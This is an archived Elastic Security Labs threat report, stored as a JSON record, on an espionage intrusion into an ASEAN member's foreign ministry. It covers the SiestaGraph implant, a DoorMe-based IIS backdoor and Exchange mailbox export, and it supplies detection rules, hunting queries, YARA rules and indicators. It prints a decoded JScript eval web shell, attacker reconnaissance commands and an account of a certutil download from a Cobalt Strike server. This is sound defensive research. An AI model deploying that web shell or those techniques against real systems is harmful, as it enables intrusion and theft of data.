{ "id": "063155e6-892a-411b-b2b6-45e8ce468f56", "created_at": "2026-04-06T00:08:31.169046Z", "updated_at": "2026-04-10T13:12:02.666062Z", "deleted_at": null, "sha1_hash": "667339bc841ad89e550b874079da69e6d7493083", "title": "SiestaGraph: New implant uncovered in ASEAN member foreign ministry", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2131337, "plain_text": "SiestaGraph: New implant uncovered in ASEAN member foreign\r\nministry\r\nBy Samir Bousseaden, Andrew Pease, Daniel Stepanic, Salim Bitam, Seth Goodwin, Devon Kerr\r\nPublished: 2022-12-16 · Archived: 2026-04-05 18:42:57 UTC\r\nKey takeaways\r\nLikely multiple threat actors are accessing and performing live on-net operations against the Foreign Affairs Office of\r\nan ASEAN member using a likely vulnerable, and internet-connected, Microsoft Exchange server. Once access was\r\nachieved and secured, the mailboxes of targeted individuals were exported.\r\nThreat actors deployed a custom malware backdoor that leverages the Microsoft Graph API for command and\r\ncontrol, which we’re naming SiestaGraph.\r\nA modified version of an IIS backdoor called DoorMe was leveraged with new functionality to allocate shellcode and\r\nload additional implants.\r\nPreamble\r\nIn early December, Elastic Security Labs observed Powershell commands used to collect and export mailboxes from an\r\ninternet-connected Microsoft Exchange server for the Foreign Affairs Office of an Association of Southeast Asian Nations\r\n(ASEAN) member.\r\nIn spite of diverse security instrumentation observed during this activity, the threat actors were able to achieve:\r\nThe execution of malware on Exchange Servers, Domain Controllers, and workstations\r\nExfiltration of targeted user and group mailboxes\r\nDeploy web shells\r\nMove laterally to user workstations\r\nPerform internal reconnaissance\r\nCollect Windows credentials\r\nBecause the intrusion is ongoing and covers almost the entire MITRE ATT\u0026CK framework, the analysis sections will use a\r\ntimeline approach.\r\nFor a deep dive analysis of the SIESTAGRAPH, DOORME, or SHADOWPAD malware families, check out our\r\nfollow on publication that covers those in detail. In addition, there are associations between this campaign and\r\nothers based on other observations and 3rd party reporting.\r\nUpdated: 2/2/2023\r\nAnalysis\r\nThe investigation, which we’re tracking as REF2924, began with the execution of a Powershell command used to export a\r\nuser mailbox. While this is a normal administrative function, the commands were executed with a process ancestry starting\r\nwith the IIS Worker Process ( w3wp.exe ) as a parent process of cmd.exe , and cmd.exe executing Powershell.\r\nThese events started the investigation that later identified multiple threat actors within the contested network environment.\r\nThe first events observed from this cluster of activity were on November 26, 2022, with the detection of a malicious file\r\nexecution on a Domain Controller. Because of this, it is likely Elastic Defend was deployed post-initial compromise and was\r\ndeployed in “Detect” mode. Throughout our analysis, we observed other security instrumentation tools in the environment\r\nindicating the victim was aware of the intrusion and trying to evict the threat actors.\r\nBecause of the multiple malware samples achieving similar goals, various DLL sideloading observations, and the presence\r\nof a likely internet-connected Exchange server; we believe that there are multiple threat actors or threat groups working\r\nindependently or in tandem with each other.\r\nNovember 26–30, 2022\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 1 of 13\n\nMalware execution\r\nThe earliest known evidence of compromise occurred on November 26, 2022, with the execution of a file called\r\nOfficeClient.exe executed from **C:\\ProgramData\\Microsoft** on a Domain Controller.\r\n10-minutes after OfficeClient.exe was executed on the Domain Controller, another malicious file was executed on another\r\nWindows 2019 server. This file was called Officeclient.exe and executed from **c:\\windows\\pla**. On November 28,\r\n2022, officeup.exe was executed on this same Windows 2019 server from **C:\\programdata**.\r\nOn November 29, 2022, the OfficeClient.exe file was executed on an Exchange server as\r\nC:\\ProgramData\\OfficeCore.exe.\r\nAll three of these files ( OfficeClient.exe , Officeclient.exe , and OfficeCore.exe ) have an original PE file name of\r\nwindowss.exe , which is the file name assigned at compile time. We are naming this malware family “SiestaGraph” because\r\nof the long sleep timer and the way that the malware uses the Microsoft Graph API for command and control.\r\nAs of December 8, 2022, we observed a variant of SiestaGraph in VirusTotal, uploaded from the Netherlands on October 14,\r\n2022. SiestaGraph makes use of a .NET API library that functions as an alternative to using Microsoft Graph, which is an\r\nAPI to interact with Microsoft cloud, including Microsoft 365, Windows, and Enterprise Mobility + Security.\r\nInternal reconnaissance\r\nOn November 28, 2022, the threat actor began performing internal reconnaissance by issuing standard commands such as\r\nwhoami , hostname , tasklist , etc. These commands were executed with a process ancestry starting with the IIS Worker\r\nProcess ( w3wp.exe ) as a parent process of cmd.exe , and cmd.exe executing the commands.\r\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"\u0026who\r\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"\u0026host\r\ncmd.exe /c cd /d C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\"\u0026task\r\nAdditional adversary reconnaissance was performed to enumerate local network assets as well as victim assets at embassies\r\nand consulates abroad. There has been no indication that this information has been subsequently exploited for additional\r\naccess or information at this time.\r\nOn November 29, 2022, the threat actor began collecting domain user and group information with the net user and net\r\ngroup commands, again issued as child processes of w3wp.exe and cmd.exe. These commands confirmed that this was not\r\nan entirely scripted campaign and included an active operator by the fact that they forgot to add the /domain syntax to two\r\nof the 20 net user commands. While the net user command does not require the /domain syntax, the fact that this was only\r\non two of the 20 occurrences, it was likely an oversight by the operator. This was the first of multiple typographical errors\r\nobserved throughout this campaign.\r\nExample of a typographical error (“yupe” instead of “type”) showing an active operator\r\nExporting Exchange mailboxes\r\nOn November 28, 2022, the threat actor started to export user mailboxes, again using the w3wp.exe process as a parent for\r\ncmd.exe , and finally Powershell. The threat actor added the Microsoft.Exchange.Management.PowerShell.SnapIn\r\nmodule. This module provides the ability to manage Exchange functions using Powershell and was used to export the\r\nmailboxes of targeted Foreign Service Officers and saved them as PST files.\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 2 of 13\n\nAbnormal process spawned from IIS Worker\r\nIn the above example, the Received -gt and Sent -gt dates timebox the collection window as all emails sent and received\r\nafter ( gt is an acronym for “greater than”) November 15, 2022. The timeboxing was not uniform across all mailboxes and\r\nthis process was repeated multiple times. Again, in the above example from November 28, 2022, the timebox was for all\r\nsent and received emails from November 15, 2022, to the current date (November 28, 2022); on December 6, 2022, the\r\nmailbox was exported again, this time with a gt value of November 28, 2022, which was the date of the last export.\r\nIn another example in this phase, the threat actors targeted a mailbox called csirt. While this is unconfirmed, “csirt” is\r\ncommonly an acronym for Cyber Security Incident Response Team.\r\nCSIRT mailbox exported\r\nTaking into consideration the timebox used on the csirt export, if this is the industry standard acronym of CSIRT, the\r\nintrusion could have started as early as September 1, 2022, and the threat actors were monitoring the CSIRT to identify if\r\ntheir intrusion had been detected.\r\nThroughout this phase, a total of 24 mailboxes were exported.\r\nOnce the mailboxes were exported, the threat actor created a 7zip archive called 7.tmp with a password of\r\nhuebfkaudfbaksidfabsdf.\r\nCreating password-protected Zip archive\r\nThree of the mailboxes, one of which being the csirt mailbox, were archived individually. These three mailboxes were\r\narchived with a .log.rar or .log file extension.\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 3 of 13\n\nTargeted mailboxes archived individually (partially obfuscated as two PST files have user initials)\r\nFinally, the threat actor created a 200m 7zip archive called o.7z and added the previously created, password-protected,\r\n7.tmp archive to it.\r\no.7z created from 7.tmp\r\nIIS backdoor module\r\nOn November 28, 2022, we observed the loading of two DLL files, Microsoft.Exchange.Entities.Content.dll and\r\niisrehv.dll through the execution of the iissvcs services using svchost.exe. Both Microsoft.Exchange.Entities.Content.dll\r\nand iisrehv.dll were loaded using the iissvcs module of the Windows Service Host through the execution of\r\nC:\\Windows\\system32\\svchost.exe -k iissvcs. These malicious IIS modules are loosely based on the DoorMe IIS backdoor.\r\nDoorMe strings embedded in IIS backdoor module\r\nFor context, IIS is web server software developed by Microsoft and used within the Windows ecosystem to host\r\nwebsites and server-side applications. Starting on version 7.0, Microsoft extended IIS by adding a modular\r\narchitecture that allows individual modules to be added or removed in order to achieve functionality depending on\r\nan environment’s needs. These modules represent individual features that the server can then use to process\r\nincoming requests.\r\nDuring the post-compromise stage, the adversary used the malicious IIS module as a passive backdoor monitoring all\r\nincoming HTTP requests. Depending on a tailor-made request by the operator, the malware will activate and process\r\ncommands. This approach can be challenging for organizations as there is usually low visibility in terms of monitoring and a\r\nlack of prevention capabilities on these types of endpoints. In order to install this backdoor, it requires administrator rights\r\nand for the module to be placed inside the %windir%\\System32\\inetsrv directory, based on the observed artifacts we\r\nbelieve initial access was gained through server exploitation from a recent wave of Microsoft Exchange RCE exploit usage.\r\nThe malicious module (C++ DLL) is first loaded through its export, RegisterModule. This function is responsible for setting\r\nup the event handler methods and dynamically resolving API libraries for future usage. The main functionality of the\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 4 of 13\n\nbackdoor is implemented using the CGlobalModule class under the event handler OnGlobalPreBeginRequest. By overriding\r\nthis event handler, the malware is loaded before a request enters the pipeline. The core functionality of the backdoor all\r\nexists in this function, including cookie validation, parsing commands, and calling underlying command functions.\r\nClass methods including malicious OnGlobalPreBeginRequest method\r\nThe malware implements an authentication mechanism based on a specific cookie name that contains the authentication key.\r\nThis malicious IIS module checks for every incoming HTTP request for the specified cookie name, and it returns a success\r\nmessage in case of a GET request. The GET request is used as a way to test the backdoor’s status for the operator, and it also\r\nreturns back the username and hostname of the impacted machine. Commands can be passed to the backdoor through POST\r\nrequests as data.\r\nGET HTTP request with the authentication cookie\r\nThroughout our analysis, we discovered old samples on VirusTotal relating to this backdoor. Although they have the same\r\nauthentication and logic, they implement different functionalities. The cookie name used for authentication was also\r\nchanged alongside the handled commands.\r\nThis observed backdoor implements four different commands, and the symbol PIPE is used to separate the command ID and\r\nits arguments.\r\nID Parameter Description\r\n0x42\r\nExpects the string\r\nGenBeaconOptions\r\nGenerates a unique Globally Unique Identifier used to identify the infected\r\nmachine and send it to the attacker\r\n0x43 Shellcode blob Execute the shellcode blob passed as a parameter in the current process\r\n0x44 N/A Write and Read from a specified named pipe\r\n0x63 Shellcode blob in chunks\r\nSimilar to command ID: 0x43, this command can receive a blob of\r\nshellcode in chunks when fully received\r\nFrom our analysis, it appears that this simplistic backdoor is used as a stage loader. It uses NT Windows APIs, mainly\r\nNtAllocateVirtualMemory , NtProtectVirtualMemory , and NtCreateThreadEx , to allocate the required shellcode\r\nmemory and to create the executing thread.\r\nkk2.exe\r\nOn November 30, 2022, an unknown binary called kk2.exe was executed on an Exchange server. While we have been\r\nunable to collect kk2.exe as of this writing, we can see that it was used to load a vulnerable driver that can be used to\r\nmonitor and terminate processes from kernel mode, mhyprot.sys. It is unclear if mhyprot.sys is downloaded, or embedded\r\ninto, kk2.exe.\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 5 of 13\n\nkk2.exe loading the vulnerable mhyprot.sys driver\r\nmhyprot.sys was detected by Elastic’s open code Windows.VulnDriver.Mhyprot YARA rule, released in August 2022.\r\nFor more information on how vulnerable drivers are used for intrusions, check out the Stopping Vulnerable Driver\r\nAttacks research Joe Desimone published in September 2022.\r\nAs stated previously, we could not collect kk2.exe for analysis but it is likely that it used mhyprot.sys to escalate to kernel\r\nmode as a way to monitor, and if necessary, terminate processes. This could be used as a way of protecting an implant, or\r\nentire intrusion, from detection.\r\nWeb shells\r\nThe following section highlights multiple attempts by the threat actors to install a web shell as a back door into the\r\nenvironment if they are evicted. While speculative in nature, it appears that most of these attempts to load web shells failed.\r\nIt is unclear what the reasons for the failures are. We’ll not cover every attempt at loading a web shell, as several of them\r\nwere very similar, but we’ll highlight the shifts in approaches.\r\nThe first attempt was to use the Microsoft certutil tool to download an Active Server Pages (ASPX) file ( config.aspx )\r\nfrom a remote host (185.239.70[.]229) and save it as the error.aspx page on the Exchange Control Panel’s webserver.\r\nBecause this IP address is a known Cobalt Strike server, it may have been blocked by network defense architecture, leading\r\nto further attempts to overwrite error.aspx.\r\nAttempt to overwrite error.aspx with config.aspx from a known Cobalt Strike server\r\nAfter attempting to use config.aspx from a Cobalt Strike C2 server, the threat actors attempted to insert Base64 encoded\r\nJavascript into a text file ( 1.txt ), use certutil to decode the Base64 encoded Javascript ( 2.aspx ), and then overwrite\r\nerror.aspx with 2.aspx. This was attempted on both the Exchange Control Panel and Outlook Web Access web servers.\r\nAttempt to overwrite error.aspx with Javascript file\r\nThe Base64 encoded string decoded into the following Javascript:\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 6 of 13\n\n\u003c%@ Page Language=\"Jscript\" Debug=true%\u003e\r\n\u003c%\r\nvar TNKY='nHsXLMPUSCABolxOgKWuIFeGVimhEjyzQrTvRcwafZdJDktqYpbN';\r\nvar ZZXG=Request.Form(\"daad\");\r\nvar VAXN=TNKY(7) + TNKY(0) + TNKY(2) + TNKY(10) + TNKY(21) + TNKY(22);\r\neval(ZZXG, VAXN);\r\n%\r\nThe preceding code is a simple web shell leveraging the eval Methodto evaluate JScript code sent through the POST\r\nparameter daad. Variations of this technique were attempted multiple times. Other attempts were observed to load\r\nobfuscated versions of the China Chopper and Godzilla web shells.\r\nDecember 1–4, 2022\r\nDLL side-loading\r\nOn December 2, 2022, on two Domain Controllers, we observed a new DLL ( log.dll ) being side loaded by a legitimate, but\r\nan 11-year-old, version of the Bitdefender Crash Handler executable (compiled name: BDReinit.exe ), 13802 AR.exe. Once\r\nexecuted, it will move to the **C:\\ProgramData\\OfficeDriver** directory, rename itself **svchost.exe** , and install itself\r\nas a service.\r\nOnce log.dll is loaded, it will spawn the Microsoft Windows Media Player ( wmplayer.exe ) and dllhost.exe and injects into\r\nthem which triggers a memory shellcode detection.\r\nUpdated 2/2/2023: In our updated research into SIESTAGRAPH, DOORME, and SHADOWPAD, we identify _ log.dll _ as\r\npart of the SHADOWPAD malware family.\r\nOn December 2, 2022, another unknown DLL, Loader.any , was interactively executed with an Administrative account\r\nusing rundll32.exe. Loader.any was observed executing two times on a Domain Controller and was then deleted\r\ninteractively.\r\nOn December 3, 2022, we observed another malicious file, APerfectDayBase.dll. While this is a known malicious file, the\r\nexecution was not observed. APerfectDayBase.dll is the legitimate name of a DLL in the import table of a benign-looking\r\nprogram, AlarmClock.exe.\r\nImport table for AlarmClock.exe\r\nThis naming appears to be an attempt to make the malicious DLL look legitimate and likely to leverage AlarmClock.exe as\r\na side-loading target. Testing has confirmed that the DLL can be side-loaded with AlarmClock.exe. While not malicious,\r\nwe are including the hash for AlarmClock.exe in the Indicators table as its presence could be used purely as a side-loading\r\nvehicle for malicious DLL, APerfectDayBase.dll.\r\nVictimology and targeting motivations\r\nDiamond model\r\nElastic Security utilizes the Diamond Model to describe high-level relationships between the adversaries, capabilities,\r\ninfrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and\r\nleveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section\r\n7.1.4) approach allows for a, although cluttered, single diamond.\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 7 of 13\n\nREF2924 diamond model\r\nVictimology\r\nThe victim is the foreign ministry of a nation in Southeast Asia. The threat actor appeared to focus priority intelligence\r\ncollection efforts on personnel and positions of authority related to the victim's relationship with ASEAN (Association of\r\nSoutheast Asian Nations).\r\nASEAN is a regional partnership union founded in 1967 to promote intergovernmental cooperation among member states.\r\nThis has been expressed through economic, security, trade, and educational cooperation with expanding international and\r\ndomestic significance for partner nations. The union itself has expanded to 10 member countries with 2 more currently\r\nseeking accession. It is exerting this international influence over the development of a Regional Comprehensive Economic\r\nPartnership trade agreement with a broader periphery of member nations (16 members and 2 applicants).\r\nASEAN and RCEP member countries\r\nBelow is a list of the targeted users, the collection window(s) in which their mailboxes were exported, and the date their\r\nmailboxes were exported.\r\nUser Collection Window Collection Date(s)\r\nUser 1 11/1/2022 - 11/28/202211/29/2022 - 12/6/2022 11/28/202212/6/2022\r\nUser 2 11/1/2022 - 11/28/2022 11/28/2022\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 8 of 13\n\nUser Collection Window Collection Date(s)\r\nUser 3 11/1/2022 - 11/28/2022 11/28/2022\r\nUser 4 11/15/2022 - 11/28/2022 11/28/2022\r\nUser 5 11/15/2022 - 11/28/202211/29/2022 - 12/6/2022 11/28/202212/6/2022\r\nUser 6 11/15/2022 - 11/28/2022 11/28/2022\r\nUser 7 11/15/2022 - 11/28/202211/29/2022 - 12/6/2022 11/28/202212/6/2022\r\nUser 8 11/15/2022 - 11/28/2022 11/28/2022\r\nUser 9 11/15/2022 - 11/28/2022 11/28/2022\r\nUser 10 9/15/2022 - 11/29/2022 11/29/2022\r\nUser 11 9/15/2022 - 11/29/2022 11/29/2022\r\nUser 12 9/15/2022 - 11/29/2022 11/29/2022\r\nUser 13 9/1/2022 - 11/30/2022 11/30/2022\r\nUser 14 9/1/2022 - 11/30/2022 11/30/2022\r\nUser 15 11/29/2022 - 12/6/2022 12/6/2022\r\nUser 16 11/29/2022 - 12/6/2022 12/6/2022\r\nUser 17 11/29/2022 - 12/6/2022 12/6/2022\r\nUser 18 11/29/2022 - 12/6/2022 12/6/2022\r\nUser 19 11/29/2022 - 12/6/2022 12/6/2022\r\nUser 20 11/29/2022 - 12/6/2022 12/6/2022\r\nUser 21 11/29/2022 - 12/6/2022 12/6/2022\r\nUser 22 11/29/2022 - 12/6/2022 12/6/2022\r\nUser 23 11/29/2022 - 12/6/2022 12/6/2022\r\nUser 24 11/29/2022 - 12/6/2022 12/6/2022\r\nAs reflected above, we observed Users 1, 5, and 7 targeted twice each indicating that the contents of their mailboxes were of\r\nparticular interest. This could be the result of pre-intrusion reconnaissance or once the initial traunch of mailboxes was\r\nreviewed by the threat actor, they decided to continue collecting on those users.\r\nTargeting motivation\r\nThere is no indication this victim would provide any direct monetary benefit to an adversary. The attack appears to be\r\nmotivated by the purpose of diplomatic intelligence gathering. There are a number of potential adversaries who would find a\r\nnation’s confidential diplomatic communications related to ASEAN, and by extension the RCEP, to be highly advantageous\r\nin furthering their own regional influence, national security, and domestic goals.\r\nIf the threat actor is excluded from ASEAN trade unions and depends on foreign aid from members of those trade unions, it\r\ncould find confidential diplomatic information specifically related to ASEAN useful for negotiating or renegotiating trade\r\nagreements.\r\nASEAN member nations are rival claimants to territorial disputes in the South China Sea (SCS). ASEAN as an organization\r\nhas not produced a unified front in the SCS dispute, with some members preferring direct nation-to-nation negotiations and\r\nsome wanting ASEAN to negotiate as a whole. Diplomatic information from ASEAN member nations might provide the\r\nthreat actor with useful information to influence decisions and negotiations around the SCS. The threat actor's interest in\r\nASEAN and any individual member would almost certainly be multifaceted covering government functions from\r\nimmigration to agriculture, to technology, to sociopolitical considerations such as human rights.\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 9 of 13\n\nDetection logic\r\nPrevention rules\r\nPotential Masquerading as SVCHOST\r\nBinary Masquerading via Untrusted Path\r\nProcess Execution from an Unusual Directory\r\nDetection rules\r\nPotential Credential Access via DCSync\r\nWindows Service Installed via an Unusual Client\r\nSuspicious Microsoft IIS Worker Descendant\r\nEncrypting Files with WinRar or 7z\r\nExporting Exchange Mailbox via PowerShell\r\nWindows Network Enumeration\r\nNTDS or SAM Database File Copied\r\nSuspicious CertUtil Commands\r\nHunting queries\r\nThe events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries\r\ncould return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an\r\ninvestigation is required to validate the findings.\r\nKQL query\r\nUsing the Discover app in Kibana, the below query will identify loaded IIS modules that have been identified as malicious\r\nby Elastic Defend (even if Elastic Defend is in “Detect Only” mode).\r\nThe proceeding and preceding wildcards (*) can be an expensive search over a large number of events.\r\nevent.code : “malicious_file” and event.action : \"load\" and process.name : “w3wp.exe” and process.command_line.wildcard :\r\nEQL queries\r\nUsing the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL\r\nqueries to hunt for behaviors similar to the SiestaGraph backdoor and the observed DLL side-loading patterns.\r\n# Hunt for DLL Sideloading using the observed DLLs:\r\nlibrary where\r\n dll.code_signature.exists == false and\r\n process.code_signature.trusted == true and\r\n dll.name : (\"log.dll\", \"APerfectDayBase.dll\") and\r\n process.executable :\r\n (\"?:\\\\Windows\\\\Tasks\\\\*\",\r\n \"?:\\\\Users\\\\*\",\r\n \"?:\\\\ProgramData\\\\*\")\r\n# Hunt for scheduled task or service from a suspicious path:\r\nprocess where event.type == \"start\" and\r\n process.executable : (\"?:\\\\Windows\\\\Tasks\\\\*\", \"?:\\\\Users\\\\Public\\\\*\", \"?:\\\\ProgramData\\\\Microsoft\\\\*\") and\r\n (process.parent.args : \"Schedule\" or process.parent.name : \"services.exe\")\r\n# Hunt for the SiestaGraph compiled file name and running as a scheduled task:\r\nprocess where event.type == \"start\" and\r\n process.pe.original_file_name : \"windowss.exe\" and not process.name : \"windowss.exe\" and process.parent.args : \"Schedule\"\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 10 of 13\n\n# Hunt for unsigned executable using Microsoft Graph API:\r\nnetwork where event.action == \"lookup_result\" and\r\n dns.question.name : \"graph.microsoft.com\" and process.code_signature.exists == false\r\nYARA\r\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the SiestaGraph malware\r\nimplant and the DoorMe IIS backdoor.\r\nrule Windows_Trojan_DoorMe {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2022-12-09\"\r\n last_modified = \"2022-12-15\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"DoorMe\"\r\n threat_name = \"Windows.Trojan.DoorMe\"\r\n reference_sample = \"96b226e1dcfb8ea2155c2fa508125472c8c767569d009a881ab4c39453e4fe7f\"\r\n strings:\r\n $seq_aes_crypto = { 8B 6C 24 ?? C1 E5 ?? 8B 5C 24 ?? 8D 34 9D ?? ?? ?? ?? 0F B6 04 31 32 44 24 ?? 88 04 29 8D 04 9\r\n $seq_copy_str = { 48 8B 44 24 ?? 48 89 58 ?? 48 89 F1 4C 89 F2 49 89 D8 E8 ?? ?? ?? ?? C6 04 1E ?? }\r\n $seq_md5 = { 89 F8 44 21 C8 44 89 C9 F7 D1 21 F1 44 01 C0 01 C8 44 8B AC 24 ?? ?? ?? ?? 8B 9C 24 ?? ?? ?? ?? 48 89\r\n $seq_calc_key = { 31 FF 48 8D 1D ?? ?? ?? ?? 48 83 FF ?? 4C 89 F8 77 ?? 41 0F B6 34 3E 48 89 F1 48 C1 E9 ?? 44 0F\r\n $seq_base64 = { 8A 45 ?? 8A 4D ?? C0 E0 ?? 89 CA C0 EA ?? 80 E2 ?? 08 C2 88 55 ?? C0 E1 ?? 8A 45 ?? C0 E8 ?? 24 ??\r\n $str_0 = \".?AVDoorme@@\" ascii fullword\r\n condition:\r\n 3 of ($seq*) or 1 of ($str*)\r\n}\r\nrule Windows_Trojan_SiestaGraph {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2022-12-14\"\r\n last_modified = \"2022-12-15\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"SiestaGraph\"\r\n threat_name = \"Windows.Trojan.SiestaGraph\"\r\n reference_sample = \"50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54\"\r\n strings:\r\n $a1 = \"downloadAsync\" ascii nocase fullword\r\n $a2 = \"UploadxAsync\" ascii nocase fullword\r\n $a3 = \"GetAllDriveRootChildren\" ascii fullword\r\n $a4 = \"GetDriveRoot\" ascii fullword\r\n $a5 = \"sendsession\" wide fullword\r\n $b1 = \"ListDrives\" wide fullword\r\n $b2 = \"Del OK\" wide fullword\r\n $b3 = \"createEmailDraft\" ascii fullword\r\n $b4 = \"delMail\" ascii fullword\r\n condition:\r\n all of ($a*) and 2 of ($b*)\r\n}\r\nObserved adversary tactics and techniques\r\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced\r\npersistent threats use against enterprise networks.\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 11 of 13\n\nTactics\r\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an\r\naction.\r\nReconnaissance\r\nInitial access\r\nExecution\r\nPersistence\r\nDefense evasion\r\nCredential access\r\nDiscovery\r\nLateral movement\r\nCollection\r\nCommand and control\r\nTechniques / Sub techniques\r\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\r\nGather host information\r\nGather victim information\r\nGather victim network information\r\nGather victim org information\r\nExploit public-facing application\r\nCommand and Scripting Interpreter: Windows command-shell\r\nCommand and Scripting Interpreter: Powershell\r\nNetwork share discovery\r\nRemote system discovery\r\nFile and directory discovery\r\nProcess discovery\r\nRemote services: SMB/Windows admin shares\r\nSystem service discovery\r\nSystem owner/user discovery\r\nHijack execution flow: DLL side-loading\r\nMasquerading: Masquerade task or service\r\nProcess injection\r\nIndicator removal: File deletion\r\nDeobfuscate/decode files or information\r\nVirtualization/sandbox evasion: Time based Evasion\r\nOS credential dumping: NTDS\r\nOS credential dumping: Security Account Manager\r\nOS credential dumping: DCSync\r\nCreate or modify system process: Windows service\r\nScheduled task/job: Scheduled task\r\nValid accounts\r\nServer software component: IIS components\r\nServer software component: Web shell\r\nEmail collection: Local email collection\r\nArchive collected data: Archive via utility\r\nScreen capture\r\nWeb service\r\nApplication layer protocol: Web protocols\r\nReferences\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.doorme\r\nhttps://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks\r\nhttps://threatfox.abuse.ch/ioc/1023850/\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 12 of 13\n\nhttps://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper\r\nhttps://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell\r\nhttps://github.com/tennc/webshell/blob/master/Godzilla/123.ashx\r\nObservables\r\nAll observables are also available for download in both ECS and STIX format in a combined zip bundle.\r\nThe following observables were discussed in this research.\r\nIndicator Type Name Refere\r\n1a87e1b41341ad042711faa0c601e7b238a47fa647c325f66b1c8c7b313c8bdf\r\nSHA-256\r\nOfficeClient.exe and OfficeCore.exe SIESTA\r\n7fc54a287c08cde70fe860f7c65ff71ade24dfeedafdfea62a8a6ee57cc91950\r\nSHA-256\r\nOfficeclient.exe SIESTA\r\nf9b2b3f7ee55014cc8ad696263b24a21ebd3a043ed1255ac4ab6a63ad4851094\r\nSHA-256\r\nofficeup.exe SIESTA\r\nc283ceb230c6796d8c4d180d51f30e764ec82cfca0dfaa80ee17bb4fdf89c3e0\r\nSHA-256 Microsoft.Exchange.Entities.Content.dll DOOR\r\n4b7d244883c762c52a0632b186562ece7324881a8e593418262243a5d86a274d\r\nSHA-256\r\niisrehv.dll Session\r\n54f969ce5c4be11df293db600df57debcb0bf27ecad38ba60d0e44d4439c39b6\r\nSHA-256\r\nkk2.exe mhypro\r\n509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6\r\nSHA-256\r\nmhyprot.sys vulnera\r\n386eb7aa33c76ce671d6685f79512597f1fab28ea46c8ec7d89e58340081e2bd\r\nSHA-256\r\n13802 AR.exeBDReinit.exe\r\nvulnera\r\nBitdefe\r\nHandle\r\n452b08d6d2aa673fb6ccc4af6cebdcb12b5df8722f4d70d1c3491479e7b39c05\r\nSHA-256\r\nlog.dll SHAD\r\n5be0045a2c86c38714ada4084080210ced8bc5b6865aef1cca658b263ff696dc\r\nSHA-256\r\nAPerfectDayBase.dll\r\nmalicio\r\ninjecte\r\nvulnera\r\n3f5377590689bd19c8dd0a9d46f30856c90d4ee1c03a68385973188b44cc9ab7\r\nSHA-256\r\nAlarmClock.exe\r\nbenign\r\nfor side\r\nAPerfe\r\nf2a9ee6dd4d1ceb4d97138755c919549549311c06859f236fc8655cf38fe5653\r\nSHA-256\r\nLoader.any\r\ncurrent\r\nDLL\r\n3b41c46824b78263d11b1c8d39cfe8c0e140f27c20612d954b133ffb110d206a\r\nSHA-256\r\nLoader.any\r\ncurrent\r\nDLL\r\n9b66cd1a80727882cfa1303ada37019086c882c9543b3f957ee3906440dc8276\r\nSHA-256\r\nClass1.exe\r\ncurrent\r\nfile\r\n185.239.70.229 ipv4 na Cobalt\r\nSource: https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nhttps://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" ], "report_names": [ "siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" ], "threat_actors": [ { "id": "f9fa9633-dfd1-458d-84ce-cc36dcdc7ce4", "created_at": "2022-10-25T16:07:24.188897Z", "updated_at": "2026-04-10T02:00:04.894484Z", "deleted_at": null, "main_name": "Siesta", "aliases": [], "source_name": "ETDA:Siesta", "tools": [ "Chymine", "Darkmoon", 